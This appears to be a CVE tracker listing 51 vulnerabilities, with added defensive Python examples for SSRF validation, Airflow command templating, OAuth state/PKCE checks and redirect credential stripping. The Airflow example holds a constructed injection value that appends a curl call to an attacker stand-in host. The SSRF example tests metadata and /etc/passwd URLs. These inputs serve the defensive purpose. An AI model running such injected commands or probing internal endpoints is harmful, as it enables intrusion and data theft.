51 CVEs tracked today. 8 Critical, 16 High, 23 Medium, 4 Low.
-
CVE-2026-41242
CRITICAL
CVSS 9.4
Code injection vulnerability in protobufjs (JavaScript protobuf library) allows authenticated attackers to execute arbitrary JavaScript code during protobuf object decoding by injecting malicious payloads into 'type' fields of protobuf definitions. Affects all versions before 7.5.5 and 8.0.1. CVSS 9.4 (Critical) reflects chained impact across multiple security boundaries (VC:H/VI:H/VA:H/SC:H/SI:H/SA:H), though exploitation requires authenticated access (PR:L) to inject malicious protobuf definitions. No active exploitation confirmed (not in CISA KEV); vendor-released patches available.
RCE
Code Injection
Red Hat
-
CVE-2026-40582
CRITICAL
CVSS 9.1
Authentication bypass in ChurchCRM versions prior to 7.2.0 allows remote unauthenticated attackers to obtain valid API keys by submitting credentials directly to the /api/public/user/login endpoint, circumventing account lockout policies and two-factor authentication enforcement. Attackers with stolen or compromised passwords can gain full API access with the victim's privileges even when the account is locked or protected by 2FA. CVSS 9.1 critical severity. Fixed in version 7.2.0 via GitHub commit 214694eb and PR #8607. No CISA KEV listing or public exploit code identified at time of analysis, though the vulnerability class (CWE-288: Authentication Bypass) is well-understood and straightforward to exploit once credentials are obtained through phishing, credential stuffing, or database leaks.
Authentication Bypass
-
CVE-2026-40572
CRITICAL
CVSS 9.0
Privilege escalation in NovumOS versions prior to 0.24 allows local unprivileged attackers to gain kernel-level execution by manipulating core kernel structures. The vulnerable Syscall 15 (MemoryMapRange) permits user-mode processes to map arbitrary virtual memory regions, including protected kernel areas (IDT, GDT, TSS, page tables), enabling modification of interrupt handlers for privilege elevation. CISA SSVC framework confirms POC availability with total technical impact, though EPSS exploitation probability remains very low (0.01%, 2nd percentile), indicating research-phase discovery rather than widespread targeting. No CISA KEV listing at time of analysis. Vendor-released patch available in version 0.24.
Privilege Escalation
-
CVE-2026-40494
CRITICAL
CVSS 9.8
Heap buffer overflow in SAIL image library's TGA decoder allows remote code execution via malformed RLE-compressed TGA files against all versions prior to commit 45d48d1. Network-accessible applications processing untrusted TGA images can be fully compromised without authentication or user interaction (CVSS 9.8). The raw-packet RLE decompression path permits writing up to 496 bytes of attacker-controlled data beyond allocated heap bounds. Vendor patch confirmed via GitHub commit 45d48d1f2e8e0d73e80bc1fd5310cb57f4547302. No CISA KEV listing or public POC identified at time of analysis, but the straightforward exploitation conditions (parsing untrusted files) and complete technical disclosure create high weaponization risk.
Buffer Overflow
Memory Corruption
-
CVE-2026-40493
CRITICAL
CVSS 9.8
Heap buffer overflow in SAIL PSD codec allows remote code execution when processing malicious LAB-mode PSD files. Affects all SAIL versions prior to commit c930284 (HappySeaFox/sail). Attackers can achieve arbitrary code execution (CVSS 9.8: AV:N/AC:L/PR:N/UI:N) by triggering a mismatch between computed bytes-per-pixel (6 bytes for 3-channel 16-bit LAB) and allocated buffer size (5 bytes for BPP40_CIE_LAB format). Every pixel write deterministically overflows the heap buffer. EPSS data not available. Not listed in CISA KEV. Patch available via GitHub commit c930284445ea3ff94451ccd7a57c999eca3bc979.
Buffer Overflow
Memory Corruption
-
CVE-2026-40492
CRITICAL
CVSS 9.8
Out-of-bounds memory access in SAIL image library's XWD codec allows remote attackers to achieve arbitrary code execution via malformed image files. The vulnerability stems from a pixel format mismatch: buffer allocation uses pixmap_depth=8 (1 byte/pixel) while the byte-swap loop uses bits_per_pixel=32 (4 bytes/pixel), so the loop overruns the buffer by 4x. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicates trivial exploitation requiring only delivery of a crafted XWD file. EPSS data unavailable; not listed in CISA KEV and no active exploitation confirmed at time of analysis. Fix available in commit 36aa5c7ec8a2bb35f6fb867a1177a6f141156b02.
Buffer Overflow
Memory Corruption
-
CVE-2026-40484
CRITICAL
CVSS 9.1
Remote code execution in ChurchCRM <7.2.0 allows authenticated administrators to upload PHP webshells through the database backup restore function, which copies files from archive Images/ directories to web-accessible paths without extension filtering. The vulnerability includes a CSRF bypass enabling forced exploitation through cross-site request forgery. Exploitation requires high privileges (administrator account) but is network-accessible with low complexity (CVSS:3.1/AV:N/AC:L/PR:H). No active exploitation confirmed (not in CISA KEV). Vendor-released fix available in version 7.2.0 via GitHub PR #8610 and commit 68be1d12.
PHP
Privilege Escalation
RCE
CSRF
-
CVE-2026-40317
CRITICAL
CVSS 9.3
Syscall 12 (JumpToUser) in NovumOS versions prior to 0.24 executes arbitrary kernel code at Ring 0 privilege when invoked by unprivileged Ring 3 user-mode processes. The vulnerability stems from missing address validation on user-supplied entry points, enabling local privilege escalation from user mode to kernel mode with complete system control. CISA SSVC framework confirms publicly available exploit code (POC status) with total technical impact, though EPSS score remains low at 0.02% (5th percentile), suggesting limited real-world targeting of this niche custom operating system despite the severe technical flaw.
Privilege Escalation
RCE
-
CVE-2026-40880
HIGH
CVSS 7.2
Consensus-breaking cache logic error in Zcash Zebra node software (all versions <4.3.1) allows malicious miners to partition the network by mining blocks containing height-invalid transactions. By submitting a transaction valid at height H+1 but invalid at H+2, then mining it into block H+2 and submitting that block before H+1, attackers trigger a cached-verification bypass: vulnerable Zebra nodes accept the invalid block while honest nodes reject it, creating a consensus split. This enables double-spend attacks against isolated nodes. EPSS data unavailable; not in CISA KEV. Classified as CWE-1025 (comparison logic error). Fixed in Zebra 4.3.1 by removing the risky cache optimization entirely.
Authentication Bypass
-
CVE-2026-40581
HIGH
CVSS 8.1
Cross-Site Request Forgery (CSRF) in ChurchCRM versions before 7.2.0 allows remote attackers to permanently delete family records and all associated data (notes, pledges, persons, property) through the SelectDelete.php endpoint. The endpoint executes irreversible deletions via plain GET requests without CSRF token validation, so a request is authorized by the victim's session cookie alone; exploitation requires only that an authenticated administrator visit a malicious page. Attackers can weaponize this via phishing emails or malicious websites to trigger silent data destruction. Fixed in version 7.2.0 via PR #8613 and commit 3936162. No KEV listing or public POC identified at time of analysis, though exploitation is trivial given the simplicity of CSRF attacks against GET endpoints.
PHP
CSRF
-
CVE-2026-40489
HIGH
CVSS 8.6
Stack-based buffer overflow in editorconfig-core-c library (versions ≤0.12.10) enables local attackers to crash applications or potentially execute arbitrary code via maliciously crafted .editorconfig files and directory structures. The fix for CVE-2023-0341 in version 0.12.6 was incomplete: it addressed only the pcre_str buffer and left the l_pattern[8194] stack buffer unprotected. Patched in version 0.12.11. No active exploitation confirmed (not in CISA KEV), but exploitable with local access and minimal complexity (CVSS AV:L/AC:L/PR:N).
Buffer Overflow
Stack Overflow
Ubuntu
-
CVE-2026-40487
HIGH
CVSS 8.9
File upload validation bypass in Postiz social media scheduler (versions before 2.21.6) allows authenticated users to upload executable file types (HTML, SVG) with spoofed Content-Type headers, achieving stored XSS when nginx serves files using their original extensions. Attackers can hijack sessions and take over other user accounts. CVSS 8.9 (High) reflects network attack vector with low complexity requiring only low-privilege authentication and user interaction. EPSS data not provided. Not listed in CISA KEV. Vendor patch released in version 2.21.6.
XSS
Nginx
File Upload
-
CVE-2026-40482
HIGH
CVSS 7.1
SQL injection in ChurchCRM's FinancialService getMemberByScanString() method allows authenticated attackers to exfiltrate sensitive database contents and modify limited data. Affects ChurchCRM versions prior to 7.2.0. The vulnerability stems from unsanitized $routeAndAccount parameter concatenated directly into SQL queries without parameterization. Fixed via commit 214694eb and pull request #8607. EPSS data not available. Not listed in CISA KEV. Public exploit code exists (GitHub advisory GHSA-hc37-vx3w-34fg with PoC). CVSS 7.1 reflects network-accessible attack requiring low-privileged authentication with high confidentiality impact and low integrity impact.
SQLi
-
CVE-2026-40480
HIGH
CVSS 7.1
Broken object-level authorization in ChurchCRM 7.1.x and earlier allows authenticated users with minimal EditSelf privileges to enumerate and exfiltrate sensitive personal data (names, addresses, phone numbers, emails) of all church members via the GET /api/person/{personId} API endpoint, which performs no object-level authorization check. While the legacy UI enforces canEditPerson() checks, the API layer omits them entirely, enabling horizontal privilege escalation (access to other members' records by incrementing personId). Fixed in version 7.2.0. CVSS 7.1 (AV:N/AC:L/PR:L) indicates network-accessible exploitation by any low-privileged authenticated user with no technical complexity. EPSS data unavailable; no KEV listing or public POC identified at time of analysis, though the fix commit and GitHub advisory provide full technical details for replication.
PHP
Authentication Bypass
-
CVE-2026-40350
HIGH
CVSS 8.8
Privilege escalation in Movary (self-hosted movie tracking app) versions before 0.71.1 allows any authenticated user to create administrator accounts and access user-management functions. The vulnerability stems from missing middleware enforcement and a broken boolean condition in authorization checks for /settings/users endpoints. Attack requires only low-privilege authenticated access (CVSS PR:L) with no user interaction (UI:N), enabling complete system takeover (C:H/I:H/A:H). Vendor has released patch version 0.71.1. No public exploit identified at time of analysis, but exploitation is trivial given the simple bypass mechanism.
Authentication Bypass
-
CVE-2026-40349
HIGH
CVSS 8.8
Authenticated users in Movary (self-hosted movie tracking web app) can escalate privileges to administrator via a missing authorization check in the user settings endpoint. By sending a crafted PUT request to `/settings/users/{userId}` with `isAdmin=true` for their own user ID, low-privilege users gain full administrative access. Movary versions prior to 0.71.1 are affected. Vendor-released patch version 0.71.1 available. EPSS data not provided; no CISA KEV listing identified. GitHub references include security advisory GHSA-mcfq-8rx7-w25v and fix commit 12c8a090.
Authentication Bypass
-
CVE-2026-40348
HIGH
CVSS 7.7
Server-Side Request Forgery in Movary movie tracking application allows authenticated users to probe internal networks and metadata endpoints. The /settings/jellyfin/server-url-verify endpoint accepts user-controlled URLs without validating against private IP ranges, enabling internal reconnaissance through the server's context. Affects all versions prior to 0.71.1. EPSS data not available, but exploitation requires only low-privilege authentication (CVSS PR:L) with low attack complexity, making this readily exploitable by any registered user. Upstream fix confirmed in version 0.71.1 via GitHub commit d459b35.
SSRF
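The check the description says is missing, written out as an added example (not Movary's code and not its fix commit): every address a user-supplied server URL resolves to must be publicly routable, and non-HTTP schemes are rejected outright. The FAKE_DNS table is constructed so the example runs offline; everything else uses the standard library.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed resolver table so the example runs offline (an assumption for this example).
# Production code resolves for real and must connect to the exact address it validated.
FAKE_DNS = {
    "jellyfin.example.org": ["1.2.3.4"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.attacker.test": ["1.2.3.5", "10.0.0.5"],   # one public, one internal answer
}


def resolve_all(host):
    """All addresses a name resolves to (constructed table first, then the system resolver)."""
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def is_public_address(ip_text):
    """False for RFC 1918, loopback, link-local (cloud metadata), multicast, reserved, unspecified."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url):
    """Return (allowed, reason) for a user-supplied server URL. Rejects non-HTTP schemes
    and any host for which at least one resolved address is not publicly routable."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme must be http or https"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ipaddress.ip_address(host)       # literal IP in the URL, including [::1] forms
        addresses = [host]
    except ValueError:
        addresses = resolve_all(host)
    if not addresses:
        return False, f"{host} does not resolve"
    for address in addresses:
        if not is_public_address(address):
            return False, f"{host} resolves to non-public address {address}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://jellyfin.example.org:8096/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://rebind.attacker.test/",
                      "file:///etc/passwd"):
        print(candidate, "->", check_outbound_url(candidate))
```

Rejecting a name when any of its answers is internal is what blocks the rebinding case; the remaining gap is time-of-check/time-of-use, so the outbound request should be pinned to the validated address rather than resolved again by the HTTP client.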
-
CVE-2026-35465
HIGH
CVSS 7.5
Path traversal in SecureDrop Client 0.17.4 and below allows a compromised SecureDrop Server to execute arbitrary code on journalist workstations by injecting malicious filenames during gzip archive extraction. The vulnerability enables overwriting the SQLite database and other critical files in the sd-app VM, potentially exposing decrypted source submissions. Fixed in version 0.17.5. No active exploitation confirmed (not in CISA KEV). CVSS 7.5 reflects high impact but complex attack chain requiring prior server compromise and user interaction. EPSS data not available, but real-world risk is constrained by the requirement to first breach a Tor-hidden, hardened server infrastructure.
RCE
-
CVE-2026-32228
HIGH
CVSS 7.5
Apache Airflow 3.0.x prior to 3.2.0 allows remote unauthenticated attackers to trigger unauthorized DAG (Directed Acyclic Graph) execution via the UI or API, bypassing asset materialize permission checks. Despite CVSS 7.5 HIGH, the CVSS vector (PR:N) contradicts the description's requirement for a 'UI/API user with asset materialize permission', which suggests authentication IS required; this discrepancy should be verified against the NVD record before prioritizing. EPSS of 0.01% (3rd percentile) indicates minimal observed exploitation activity. Vendor-released patch available in Airflow 3.2.0 per Apache advisory.
Authentication Bypass
-
CVE-2026-30912
HIGH
CVSS 7.5
Apache Airflow before 3.2.0 exposes SQL exception stack traces through API responses despite api/expose_stack_traces=false configuration, allowing remote unauthenticated attackers to enumerate database schema details, table names, query structure, and internal filesystem paths. CVSS 7.5 (High) with network vector and no authentication required. EPSS score of 0.02% (4th percentile) indicates low probability of widespread exploitation. Vendor patch available in Airflow 3.2.0 per Apache advisory. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.
Apache
Information Disclosure
-
CVE-2026-30898
HIGH
CVSS 8.8
Command injection in Apache Airflow's BashOperator documentation example allows authenticated attackers to escalate privileges from UI user to worker-level code execution. Affects all Airflow versions before 3.2.0. The vulnerability stems from documentation suggesting unsafe handling of dag_run.conf parameters, which organizations may have replicated in production DAGs. EPSS score of 0.03% indicates low observed exploitation probability, though the upstream fix (PR #64129) demonstrates vendor acknowledgment and remediation.
Command Injection
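What the documentation pattern gets wrong, as an added example (not Airflow's code or its fix in PR #64129): a trigger-time `dag_run.conf` value rendered into `bash_command` becomes part of the command line, so shell metacharacters in it run as extra commands. The `render` function is a stand-in for Jinja templating written for this example, and the trigger conf is constructed. The hardened forms pass the value through `env` with a fixed command, or shell-quote it before substitution.

```python
import re
import shlex

# Stand-in for Airflow's Jinja rendering of templated fields (an assumption for this example,
# not Airflow's renderer): substitutes {{ dag_run.conf['key'] }} with the trigger conf value.
CONF_REF = re.compile(r"""\{\{\s*dag_run\.conf\[['"](\w+)['"]\]\s*\}\}""")


def render(template, conf):
    return CONF_REF.sub(lambda m: str(conf.get(m.group(1), "")), template)


def render_quoted(template, conf):
    """Same substitution, but each value is single-quoted for the shell before insertion."""
    return CONF_REF.sub(lambda m: shlex.quote(str(conf.get(m.group(1), ""))), template)


def render_env(env_template, conf):
    """Render templated environment values; the command string itself is never templated."""
    return {k: render(v, conf) for k, v in env_template.items()}


CONTROL_OPS = {";", "&&", "||", "|", "&"}


def shell_tokens(cmd):
    """Tokenise the way a POSIX shell would, keeping control operators as their own tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def count_simple_commands(cmd):
    """Number of simple commands the shell would run for cmd (split on ; && || | &)."""
    count, current = 0, []
    for tok in shell_tokens(cmd):
        if tok in CONTROL_OPS:
            if current:
                count += 1
                current = []
        else:
            current.append(tok)
    return count + (1 if current else 0)


# Constructed trigger conf from a low-privilege UI/API user.
MALICIOUS_CONF = {"message": "hello; curl http://attacker.example/leak"}

# 1. The documentation pattern: conf rendered straight into the command string.
UNSAFE_TEMPLATE = "echo {{ dag_run.conf['message'] }}"

# 2. Hardened: conf reaches the shell only as an environment variable; the command is fixed.
SAFE_COMMAND = 'echo "$MESSAGE"'
SAFE_ENV_TEMPLATE = {"MESSAGE": "{{ dag_run.conf['message'] }}"}

if __name__ == "__main__":
    unsafe = render(UNSAFE_TEMPLATE, MALICIOUS_CONF)
    print(repr(unsafe), "->", count_simple_commands(unsafe), "commands")
    print(repr(SAFE_COMMAND), "->", count_simple_commands(SAFE_COMMAND), "command; env =",
          render_env(SAFE_ENV_TEMPLATE, MALICIOUS_CONF))
    quoted = render_quoted(UNSAFE_TEMPLATE, MALICIOUS_CONF)
    print(repr(quoted), "->", count_simple_commands(quoted), "command")
```

The `env` form is the one to prefer in a real DAG: the worker still runs `echo` with the attacker's string as a single argument, and the value never passes through a second shell parse.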
-
CVE-2026-25917
HIGH
CVSS 7.2
Deserialization vulnerability in Apache Airflow webserver (all versions before 3.2.0) allows network-accessible attackers to execute arbitrary code by injecting malicious XCom payloads, despite vendor-assigned Low severity due to the trusted Dag Author threat model. The CVSS vector cited in the record (AV:N/PR:N, 9.8 Critical) describes unauthenticated network-based RCE, which contradicts both the description's trust assumption and the 7.2 score tracked here; verify against the NVD record before prioritizing. EPSS 0.07% (22nd percentile) suggests low immediate exploitation likelihood. No active exploitation confirmed; vendor patch available in version 3.2.0 with public GitHub PR.
RCE
Apache
Deserialization
-
CVE-2026-6518
HIGH
CVSS 8.8
Remote code execution in CMP - Coming Soon & Maintenance Plugin by NiteoThemes for WordPress (versions ≤4.1.16) allows authenticated attackers with Editor-level privileges and above to upload and execute arbitrary PHP code via a malicious ZIP file. The vulnerability stems from insufficient capability checking (the cmp_theme_update_install AJAX action checks publish_pages, a capability Editors hold, instead of the administrator-only manage_options) combined with absent file validation. CVSS 8.8 reflects high impact across confidentiality, integrity, and availability. No CISA KEV listing or public exploit code identified at time of analysis, suggesting limited real-world exploitation despite the high severity rating. Wordfence Threat Intelligence disclosed this vulnerability with detailed source code references.
WordPress
RCE
File Upload
-
CVE-2026-2262
HIGH
CVSS 7.5
Unauthenticated information disclosure in WordPress Easy Appointments plugin ≤3.12.21 exposes customer appointment data via unprotected REST API endpoint. Remote attackers without authentication can extract full names, email addresses, phone numbers, IP addresses, appointment descriptions, and pricing information through `/wp-json/wp/v2/eablocks/ea_appointments/`. CVSS score 7.5 (High) with EPSS data not yet available. Patch released in version 3.12.22 per WordPress plugin repository changeset. No active exploitation confirmed (not in CISA KEV), but the trivial exploit complexity (AV:N/AC:L/PR:N/UI:N) and privacy impact make this a priority for sites handling sensitive appointment data.
WordPress
Information Disclosure
-
CVE-2026-41254
MEDIUM
CVSS 4.0
Integer overflow in Little CMS (lcms2) version 2.18 and earlier allows local attackers to trigger a buffer overflow via CubeSize calculation in cmslut.c, where the overflow check occurs after rather than before multiplication. This can result in memory corruption leading to information disclosure or denial of service with low complexity requirements. No active exploitation in CISA KEV confirmed at time of analysis, but proof-of-concept technical details are publicly available.
Buffer Overflow
Suse
-
CVE-2026-41253
MEDIUM
CVSS 6.9
Code execution in iTerm2 through version 3.6.9 allows attackers to run arbitrary code on the user's machine when the user displays a specially crafted text file (for example with cat) while a malicious file with a conductor-protocol-compatible name exists in the working directory. The vulnerability exploits iTerm2's acceptance of SSH conductor protocol sequences (DCS 2000p and OSC 135) from terminal output without validating the source, enabling in-band signaling abuse where filenames themselves become attack vectors. CVSS 6.9 reflects the local attack vector and high complexity; practical exploitation requires user interaction (displaying the file) combined with attacker-controlled files already resident in the directory.
RCE
-
CVE-2026-41078
MEDIUM
CVSS 5.9
OpenTelemetry.Exporter.Jaeger allows memory exhaustion and denial of service when processing high-cardinality or attacker-influenced telemetry data due to pooled list structures that retain oversized allocations across subsequent requests. The affected .NET NuGet package may experience sustained memory pressure if telemetry attributes or events contain large payloads, particularly in environments where input originates from untrusted sources and memory limits are increased from defaults. Notably, this deprecated exporter (end-of-support since 2023) will not receive vendor patches and users should migrate to maintained alternatives such as OpenTelemetry Protocol (OTLP) exporters.
Denial Of Service
-
CVE-2026-40948
MEDIUM
CVSS 5.4
Session fixation and login-CSRF in apache-airflow-providers-keycloak prior to 0.7.0 allows remote attackers without prior authentication to hijack user sessions by delivering a crafted OAuth callback URL, enabling credential theft from stored Airflow connections. The vulnerability stems from missing OAuth 2.0 state parameter validation and lack of PKCE implementation, requiring only user interaction to trick victims into clicking a malicious link. EPSS score of 0.01% suggests minimal real-world exploitation despite moderate CVSS impact rating.
Apache
CSRF
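The two controls the description names as missing, as an added example (not the provider's code): a per-session `state` bound at login start and checked on the callback, and an S256 PKCE verifier/challenge pair. The in-memory SESSIONS store and the `query_param` helper are assumptions for this example; the PKCE arithmetic follows RFC 7636 and is checked against that RFC's own test vector.

```python
import base64
import hashlib
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Server-side session store, constructed in memory for this example (an assumption; a real
# deployment keeps this in the web framework's session backend).
SESSIONS = {}


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def pkce_challenge(verifier):
    """S256 code_challenge for a code_verifier (RFC 7636 section 4.2)."""
    return b64url(hashlib.sha256(verifier.encode("ascii")).digest())


def query_param(url, name):
    return parse_qs(urlsplit(url).query).get(name, [None])[0]


def start_login(session_id, authorize_url, client_id, redirect_uri):
    """Create the authorization request and bind a fresh state and PKCE verifier to this session."""
    state = secrets.token_urlsafe(32)
    verifier = b64url(secrets.token_bytes(32))        # 43-character verifier
    SESSIONS[session_id] = {"state": state, "verifier": verifier}
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "state": state,
        "code_challenge": pkce_challenge(verifier),
        "code_challenge_method": "S256",
    }
    return f"{authorize_url}?{urlencode(params)}"


def handle_callback(session_id, callback_url):
    """Validate the redirect back from the IdP. Returns (code, verifier) for the token request,
    or raises PermissionError. The pending login is consumed, so a replayed callback also fails."""
    pending = SESSIONS.pop(session_id, None)
    if pending is None:
        raise PermissionError("no login in progress for this session")
    state = query_param(callback_url, "state")
    if state is None or not secrets.compare_digest(state.encode(), pending["state"].encode()):
        raise PermissionError("state mismatch: callback was not started by this session")
    code = query_param(callback_url, "code")
    if not code:
        raise PermissionError("missing authorization code")
    return code, pending["verifier"]


def callback_accepted(session_id, callback_url):
    """Convenience wrapper: True if the callback passes validation."""
    try:
        handle_callback(session_id, callback_url)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    url = start_login("victim", "https://idp.example/auth", "airflow", "https://airflow.example/oauth-callback")
    print("authorize:", url)
    print("forged callback accepted:",
          callback_accepted("victim", "https://airflow.example/oauth-callback?code=attacker&state=forged"))
```

A link an attacker delivers carries a `state` that was never bound to the victim's session, so the session-fixation step fails before any token exchange; the verifier is then sent with the code so a captured code alone cannot be redeemed.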
-
CVE-2026-40881
MEDIUM
CVSS 6.3
Zebra cryptocurrency node prior to version 4.3.1 allocates excessive memory (up to 233,016 addresses) when deserializing addr/addrv2 protocol messages, even though the specification limits messages to 1,000 addresses. An attacker can trigger out-of-memory crashes by sending multiple oversized address messages over different connections. This is a network-accessible denial of service vulnerability affecting all Zebra versions before 4.3.1, with no public exploit code identified but straightforward to execute given the protocol specification.
Denial Of Service
Deserialization
-
CVE-2026-40593
MEDIUM
CVSS 4.8
Stored cross-site scripting in ChurchCRM UserEditor.php prior to version 7.2.0 allows authenticated administrators to inject malicious HTML and JavaScript into username fields, which then executes in the browsers of other administrators viewing the user editor page. The vulnerability stems from failure to sanitize usernames before rendering them into HTML input value attributes, and exploitation requires administrator-level privileges combined with user interaction (another admin viewing the compromised user's editor). This is a low-CVSS but real privilege-escalation concern within multi-administrator deployments, particularly where administrators may have differing trust levels.
PHP
XSS
-
CVE-2026-40491
MEDIUM
CVSS 6.5
gdown prior to version 5.2.2 allows remote attackers to write arbitrary files outside the intended extraction directory via maliciously crafted ZIP or TAR archives due to insufficient path traversal validation in the extractall functionality. An attacker can craft a malicious archive with path traversal sequences (e.g., ../ entries) in filenames, which when extracted by a user, permits file overwrite and potential remote code execution. The attacker needs no privileges; the vulnerability requires user interaction (UI:R) in that a victim must download and extract an attacker-supplied archive with gdown.
RCE
Path Traversal
Google
-
CVE-2026-40490
MEDIUM
CVSS 6.8
AsyncHttpClient (AHC) library prior to versions 3.0.9 and 2.14.5 leaks Authorization, Proxy-Authorization headers, and plaintext Realm credentials to arbitrary redirect targets when followRedirect(true) is enabled, affecting all Java applications using vulnerable versions. This occurs across domain, scheme, and port changes including HTTPS-to-HTTP downgrades. An attacker controlling a redirect destination via open redirect, DNS rebinding, or MITM can capture Bearer tokens, Basic auth credentials, or any Authorization header value. No public exploit code or active exploitation has been confirmed at analysis time, though the vulnerability is reliably exploitable whenever redirect following is enabled and the attacker can influence a redirect target (CVSS 6.8, network vector, no authentication required).
Java
Information Disclosure
Open Redirect
Red Hat
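The redirect policy a client needs, as an added example (not AsyncHttpClient's code or its fix): credential headers are forwarded only when scheme, host and effective port all match the request that carried them, which covers the cross-domain, port-change and HTTPS-to-HTTP cases listed above. The RESPONSES table is a constructed stand-in for server behaviour so the simulation runs offline.

```python
from urllib.parse import urljoin, urlsplit

# Headers that carry credentials and must not travel to another origin.
CREDENTIAL_HEADERS = {"authorization", "proxy-authorization", "cookie"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def origin(url):
    """(scheme, host, effective port) so https://a.example and https://a.example:443 compare equal."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or {"http": 80, "https": 443}.get(scheme)
    return scheme, (parts.hostname or "").lower(), port


def headers_for_redirect(from_url, to_url, headers):
    """Headers to send on the redirected request: credentials are stripped unless scheme,
    host and port all match, so cross-host hops and https->http downgrades lose them."""
    if origin(from_url) != origin(to_url):
        return {k: v for k, v in headers.items() if k.lower() not in CREDENTIAL_HEADERS}
    return dict(headers)


# Constructed server behaviour for the simulation: url -> (status, Location header or None).
RESPONSES = {
    "https://api.example.com/v1/export": (302, "https://cdn.attacker.example/export.zip"),
    "https://cdn.attacker.example/export.zip": (200, None),
    "https://api.example.com/v1/me": (301, "http://api.example.com/v1/me"),
    "http://api.example.com/v1/me": (200, None),
    "https://api.example.com/v1/old": (308, "/v1/new"),
    "https://api.example.com/v1/new": (200, None),
}


def follow(url, headers, responses=RESPONSES, max_hops=5):
    """Simulated redirect-following client. Returns [(url, sorted header names sent)] per hop."""
    trail = []
    for _ in range(max_hops):
        trail.append((url, sorted(k.lower() for k in headers)))
        status, location = responses[url]
        if status not in REDIRECT_STATUSES or not location:
            return trail
        next_url = urljoin(url, location)          # Location may be relative
        headers = headers_for_redirect(url, next_url, headers)
        url = next_url
    raise RuntimeError("too many redirects")


if __name__ == "__main__":
    creds = {"Authorization": "Bearer s3cr3t", "Accept": "application/zip"}
    for start in ("https://api.example.com/v1/export", "https://api.example.com/v1/me",
                  "https://api.example.com/v1/old"):
        print(follow(start, creds))
```

The same-origin hop keeps the header, the attacker-controlled CDN and the plaintext downgrade do not; a client that applies this policy still completes the redirect, it just arrives without the token.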
-
CVE-2026-40485
MEDIUM
CVSS 5.3
ChurchCRM versions prior to 7.2.0 leak valid usernames through the public API login endpoint by returning distinguishable HTTP status codes (404 for non-existent users, 401 for valid users with wrong passwords). An unauthenticated attacker can enumerate valid usernames without rate limiting or account lockout restrictions, enabling targeted credential attacks and social engineering. This information disclosure vulnerability affects all ChurchCRM deployments using the vulnerable API endpoint and has been patched in version 7.2.0.
Information Disclosure
-
CVE-2026-40483
MEDIUM
CVSS 5.4
ChurchCRM versions prior to 7.2.0 allow authenticated users with Finance permissions to store malicious JavaScript in pledge donation comments via missing HTML escaping, which executes in the browsers of any subsequent users who edit the pledge record, resulting in stored cross-site scripting (XSS). The vulnerability requires Finance role access and victim interaction (opening the pledge editor), but affects all users who view the compromised record, with no known public exploit code or active exploitation confirmed at time of analysis.
XSS
-
CVE-2026-40340
MEDIUM
CVSS 6.1
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a USB-connected camera to trigger information disclosure or denial of service via malformed PTP protocol data during Samsung Galaxy device enumeration. The vulnerability exists in `ptp_unpack_OI()`, which checks that at least 48 bytes are present but then reads fields beyond that limit (up to 56 bytes into the buffer), so a short object-info response is read past its end. A fix is available in commit 7c7f515bc88c3d0c4098ac965d313518e0ccbe33.
Buffer Overflow
Information Disclosure
Samsung
Red Hat
Suse
-
CVE-2026-40339
MEDIUM
CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a connected camera to read sensitive memory and potentially cause denial of service via a specially crafted Sony camera device. The vulnerability exists in the Sony-specific PTP packet unpacking function which omits bounds validation present in the standard variant, enabling attackers with direct camera access to trigger information disclosure and minor availability impact.
Buffer Overflow
Information Disclosure
Red Hat
Suse
-
CVE-2026-40338
MEDIUM
CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows physical attackers to disclose sensitive memory and cause denial of service via a malicious PTP (Picture Transfer Protocol) device. The vulnerability exists in the Sony-specific DPD unpacking function, which fails to validate buffer boundaries before reading an enumeration count, enabling attackers with direct device access to craft responses that trigger the out-of-bounds read. Patch is available via upstream commit 3b9f9696be76ae51dca983d9dd8ce586a2561845.
Buffer Overflow
Information Disclosure
Red Hat
Suse
-
CVE-2026-40337
MEDIUM
CVSS 5.1
Sentry kernel prior to version 0.4.7 allows tasks with DEV or IO capabilities to manipulate another task's IRQ line via the __sys_int_* syscall family, enabling denial of service and covert information channels between privileged tasks and external systems. The vulnerability affects embedded systems using Sentry micro-kernel versions before 0.4.7, and no public exploit code has been identified at time of analysis, though the fix is vendor-released and publicly available.
Information Disclosure
-
CVE-2026-40335
MEDIUM
CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 in the PTP protocol parser allows information disclosure and potential denial of service when processing specially crafted camera responses. The vulnerability exists in ptp_unpack_DPV() where UINT128 and INT128 cases advance the buffer offset by 16 bytes without verifying sufficient buffer remains available, potentially exposing adjacent memory. Exploitation requires physical access to connect a malicious camera device (AV:P), but no special authentication or user interaction is needed once connected. No public exploit code identified at time of analysis.
Buffer Overflow
Information Disclosure
Red Hat
Suse
-
CVE-2026-40333
MEDIUM
CVSS 6.1
